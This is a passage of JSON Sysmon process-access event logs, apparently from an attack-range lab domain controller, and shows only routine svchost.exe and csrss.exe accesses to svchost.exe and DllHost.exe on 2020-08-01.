07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010FA520400}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010FA520400}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010FA520400}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010FA520400}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.704\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.704","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
